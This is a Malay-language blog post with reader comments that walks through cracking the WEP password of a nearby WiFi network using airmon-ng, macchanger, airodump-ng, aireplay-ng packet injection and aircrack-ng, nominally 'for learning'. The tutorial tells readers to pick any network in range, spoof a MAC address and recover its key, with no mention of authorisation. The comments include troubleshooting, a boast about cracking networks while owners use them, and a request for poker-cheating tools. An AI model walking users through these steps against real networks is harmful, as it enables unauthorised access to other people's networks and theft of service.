WEP merupakan sejenis encryption untuk password WiFi. Ia dah tak banyak digunakan lagi kerana sangat lemah dan mudah dipecahkan. Bagi tujuan pembelajaran, kali ini saya akan tunjukkan betapa mudahnya untuk crack password WiFi yang menggunakan WEP.
Apa yang anda perlukan:
- Sebiji wireless adapter yang boleh melakukan packet injection. Biasanya wireless adapter yang terbina pada laptop anda tidak mempunyai fungsi ini, jadi anda perlu dapatkannya daripada kedai ataupun secara online. Saya menggunakan Alfa AWUS050NH yang saya beli dari eBay, kira-kira RM70.
- Linux sebagai operating system. Anda juga boleh menggunakan Backtrack Live CD tetapi saya lebih selesa menggunakan Ubuntu Linux sepenuhnya.
Tutorial ini lebih senang diikuti jika anda biasa dengan Linux, serta biasa menggunakan command line pada Linux. Saya hanya akan masukkan arahan yang paling penting sahaja, namun biasanya anda mungkin akan perlu pasang beberapa software untuk memastikannya berjaya.
Cara-cara crack password WiFi yang menggunakan WEP
1. Buka terminal. Pertama sekali, anda perlu mendapatkan nama interface bagi wireless adapter anda:
airmon-ng
Pada komputer saya, interface bagi wireless adapter saya adalah wlan1. Komputer anda mungkin berbeza, jadi ingat nama tersebut untuk digunakan pada arahan-arahan seterusnya.
2. Jalankan arahan berikut. Gantikan (interface) dengan nama yang baru anda dapat tadi.
airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface)
3. Senaraikan semua WiFi yang ada berdekatan.
airodump-ng (interface)
Pilih rangkaian WiFi mana yang anda ingin crack, dan salin BSSID, channel, dan nama rangkaian tersebut. Pastikan rangkaian yang anda pilih itu menggunakan WEP.
4. Jalankan arahan berikut menggunakan maklumat yang anda baru dapat tadi. Gunakan apa sahaja nama fail yang anda mahu bagi (nama fail). Biarkan proses ini berjalan.
airodump-ng -c (channel) -w (nama fail) --bssid (bssid) (interface)
5. Buka satu terminal yang lain dan jalankan arahan ini pula. (essid) adalah nama rangkian WiFi yang anda ingin crack.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
Jika ia berjaya, mesej “Association successful” akan dipaparkan.
6. Jalankan arahan ini untuk mula mengumpul data tentang pasword WiFi yang anda ingin crack.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
7. Kembali ke skrin pada langkah 4 dan perhatikan bahagian #Data. Tunggu sehingga bahagian ini berjaya mengumpul sekitar 10’000 data sebelum anda pergi ke langkah seterusnya. Biasanya proses ini hanya mengambil masa kira-kira 5 ke 10 minit.
8. Setelah cukup mengumpul data, tibalah masa untuk mendapatkan password. Buka satu lagi terminal dan jalan arahan ini.
aircrack-ng -b (bssid) (nama fail.cap)
Sekiranya berhasil, mesej “Key Found” akan dipaparkan beserta password yang berjaya anda crack. Anda sudah berjaya!
Rujukan: Lifehacker
Kemaskini: Jika anda mempunyai masalah dengan channel, gunakan arahan ini untuk menukar channel bagi antaramuka wireless anda. (interface) adalah antaramuka kad wireless, dan $ adalah nombor channel tersebut:
ifconfig (interface) down iwconfig (interface) mode managed ifconfig (interface) up iwconfig (interface) channel $ ifconfig (interface) down iwconfig (interface) mode monitor ifconfig (interface) up
Rujukan: Forum Ubuntu






Assalam..
Fuhh…banyaknya step..
Guna je yang halal..
ayat2 org taktau IT…. looser (*_*)-L
Klau nk gner yg halal buat per nk baca nie..haiz..
betul tu…buat ape nak hack-hack…ilmu ditimba untuk apa kalau asyik dok buat benda haram jew..kesian la org yg bayor bulan2. ..betul kata iza tu…aku kalau susah-susah mcm tu, baik aku p subscribe ajew…
aku dapat error ni la bila pas command aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)..huhu
18:21:47 Waiting for beacon frame (BSSID: 00:1F:A4:81:65:18) on channel -1
18:21:47 mon0 is on channel -1, but the AP uses channel 1
Ikut step kat sini: http://ubuntuforums.org/showthread.php?t=1685960
orait..lg satu, Alfa AWUS050NH tu xde jual kat lowyat ek..mmg kna beli kat ebay ke..
Tak tau la ada kat LowYat ke tak, aku malas nak pergi kedai ni. Senang order je, tapi lambat sikit la sampai, haha.
benda gune software sebenarnya bkan hack.kecuali guna window application seperti backtrack,ubuntu dan lain2.cara sembangcomputer guna ni bleh gak.
Tuan…,wifi connected tapi internet tak dpt akses,apa masalahnya…?
Terima kasih.
by step le br mcabar kita…he….he….guan yg halal x best x ade keseronokan
thk u admin
Paling senang nak hack WEP la. Lagi senang kalau masa tu tuan dia tengah guna. Beberapa saat je boleh dapat password dah.
ye ke?? Amaciam brade?? Shared2 la.. Hehe
Sy nak tanya,kamu ada software hack poker x?klau ada bantu saya
nak hack poker guna cheat engine 6.2 atau lain2.
10q admin, berkesan, saja suka2 nak hack. kat rumah dah ada wifi dah.
Nak tau…wifi booster ape yg bagus? Pastu kalau guna MacBook pro leh hack wifi x?
passwords wifi saya terlupa…x de ker cara yang senang skit..
susah nak cari kata laluan wi fi
tok paham sikit abot
what software re u using for hacking wep?